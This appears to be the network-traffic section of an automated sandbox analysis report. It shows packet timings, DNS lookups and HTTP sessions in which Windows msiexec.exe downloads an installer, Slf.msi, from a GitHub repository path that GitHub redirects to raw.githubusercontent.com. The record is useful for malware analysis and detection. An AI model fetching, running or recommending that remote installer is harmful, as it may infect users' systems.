                                                                                                              Nov 30, 2024 01:25:10.101718903 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.101764917 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.101805925 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.101840019 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.101866961 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.109154940 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.109217882 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.109251976 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.109268904 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.109301090 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.109322071 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.116482973 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.116537094 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.116590023 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.116605043 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.116640091 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.116668940 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.123055935 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.123102903 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.123147011 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.123162031 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.123189926 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.123209953 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.130975008 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.131028891 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.131071091 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.131084919 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.131112099 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.131160975 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.137557983 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.137623072 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.137648106 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.137660980 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.137689114 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.137712955 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.164975882 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.164994955 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.165093899 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.165115118 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.165169954 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.296251059 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.296271086 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.296566963 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.296588898 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.296636105 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.302714109 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.302727938 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.302803040 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.302810907 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.302854061 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.310319901 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.310333967 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.310395956 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.310410023 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.310453892 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.317600965 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.317615986 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.317672014 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.317687035 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.317732096 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.325073957 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.325088024 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.325140953 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.325154066 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.325189114 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.325211048 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.332046032 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.332060099 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.332127094 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.332140923 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.332173109 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.338706970 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.338721991 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.338800907 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.338814974 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.338850021 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.366425037 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.366441011 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.366496086 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.366512060 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.366549015 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.497513056 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.497553110 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.497688055 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.497714043 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.497765064 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.504045010 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.504075050 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.504172087 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.504179955 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.504223108 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.511496067 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.511524916 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.511605978 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.511616945 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.511657953 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.518868923 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.518893957 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.518971920 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.518982887 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.519021034 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.526411057 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.526442051 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.526518106 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.526527882 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.526562929 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.533361912 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.533381939 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.533446074 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.533458948 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.533494949 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.539927959 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.539944887 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.540019035 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.540028095 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.540056944 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.567946911 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.567970037 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.568042994 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.568054914 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.568087101 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.698822975 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.698865891 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.698991060 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.699016094 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.699060917 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.706229925 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.706252098 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.706353903 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.706367016 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.706407070 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.712811947 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.712830067 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.712905884 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.712930918 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.712975025 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.720182896 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.720201969 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.720283985 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.720299959 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.720370054 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.727675915 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.727699041 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.727780104 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.727801085 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.727859020 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.734648943 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.734666109 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.734751940 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.734781027 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.734836102 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.742145061 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.742161036 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.742228985 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.742234945 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.742275953 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.780793905 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.780839920 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.780889988 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.780953884 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.781001091 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.781019926 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.925107956 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.925131083 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.925211906 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.925236940 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.925281048 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.932574987 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.932594061 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.932682037 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.932703018 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.932745934 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.939121962 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.939137936 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.939191103 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.939202070 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.939228058 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.939244032 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.946703911 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.946719885 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.946779966 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.946796894 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.946834087 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.953988075 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.954003096 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.954077959 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.954092979 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.954137087 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.960939884 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.960957050 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.961025000 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.961034060 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.961071968 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.968460083 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.968475103 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.968553066 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.968560934 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.968600035 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.994652987 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.994668961 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.994739056 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.994757891 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.994792938 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.126485109 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.126508951 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.126580000 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.126600027 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.126641989 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.133949995 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.133964062 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.134038925 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.134046078 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.134084940 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.140501976 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.140517950 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.140568018 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.140574932 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.140611887 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.147994995 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.148011923 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.148082972 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.148089886 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.148130894 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.155368090 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.155385017 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.155448914 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.155457020 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.155499935 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.162468910 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.162487030 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.162549019 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.162558079 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.162604094 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.169856071 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.169892073 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.169951916 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.169961929 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.170001030 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.195848942 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.195869923 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.195943117 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.195960045 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.196006060 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.394608021 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.394638062 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.394649029 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.394655943 CET44349709185.199.108.133192.168.2.6
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Nov 30, 2024 01:25:00.050364017 CET6380153192.168.2.61.1.1.1
                                                                                                              Nov 30, 2024 01:25:00.187908888 CET53638011.1.1.1192.168.2.6
                                                                                                              Nov 30, 2024 01:25:03.259892941 CET4950553192.168.2.61.1.1.1
                                                                                                              Nov 30, 2024 01:25:03.398808956 CET53495051.1.1.1192.168.2.6
                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Nov 30, 2024 01:25:00.050364017 CET192.168.2.61.1.1.10x5189Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                              Nov 30, 2024 01:25:03.259892941 CET192.168.2.61.1.1.10x56dcStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Nov 30, 2024 01:25:00.187908888 CET1.1.1.1192.168.2.60x5189No error (0)github.com20.233.83.145A (IP address)IN (0x0001)false
                                                                                                              Nov 30, 2024 01:25:03.398808956 CET1.1.1.1192.168.2.60x56dcNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                              Nov 30, 2024 01:25:03.398808956 CET1.1.1.1192.168.2.60x56dcNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                              Nov 30, 2024 01:25:03.398808956 CET1.1.1.1192.168.2.60x56dcNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                              Nov 30, 2024 01:25:03.398808956 CET1.1.1.1192.168.2.60x56dcNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                              Nov 30, 2024 01:25:05.033740044 CET1.1.1.1192.168.2.60x5537No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Nov 30, 2024 01:25:05.033740044 CET1.1.1.1192.168.2.60x5537No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                              Nov 30, 2024 01:25:12.104166031 CET1.1.1.1192.168.2.60x7114No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Nov 30, 2024 01:25:12.104166031 CET1.1.1.1192.168.2.60x7114No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                              Nov 30, 2024 01:25:16.120347023 CET1.1.1.1192.168.2.60x3788No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                              Nov 30, 2024 01:25:16.120347023 CET1.1.1.1192.168.2.60x3788No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                              Nov 30, 2024 01:26:14.000999928 CET1.1.1.1192.168.2.60xcf5cNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                              Nov 30, 2024 01:26:14.000999928 CET1.1.1.1192.168.2.60xcf5cNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                              • github.com
                                                                                                              • raw.githubusercontent.com
                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.64970720.233.83.1454434896C:\Windows\System32\msiexec.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-11-30 00:25:02 UTC145OUTGET /Kroby5444/Jim/raw/refs/heads/main/Slf.msi HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept: */*
                                                                                                              User-Agent: Windows Installer
                                                                                                              Host: github.com
                                                                                                              2024-11-30 00:25:03 UTC552INHTTP/1.1 302 Found
                                                                                                              Server: GitHub.com
                                                                                                              Date: Sat, 30 Nov 2024 00:25:02 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                              Access-Control-Allow-Origin:
                                                                                                              Location: https://raw.githubusercontent.com/Kroby5444/Jim/refs/heads/main/Slf.msi
                                                                                                              Cache-Control: no-cache
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                              X-Frame-Options: deny
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 0
                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                              2024-11-30 00:25:03 UTC3379INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                              Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.649709185.199.108.1334434896C:\Windows\System32\msiexec.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-11-30 00:25:04 UTC156OUTGET /Kroby5444/Jim/refs/heads/main/Slf.msi HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept: */*
                                                                                                              User-Agent: Windows Installer
                                                                                                              Host: raw.githubusercontent.com
                                                                                                              2024-11-30 00:25:05 UTC901INHTTP/1.1 200 OK
                                                                                                              Connection: close
                                                                                                              Content-Length: 3581440
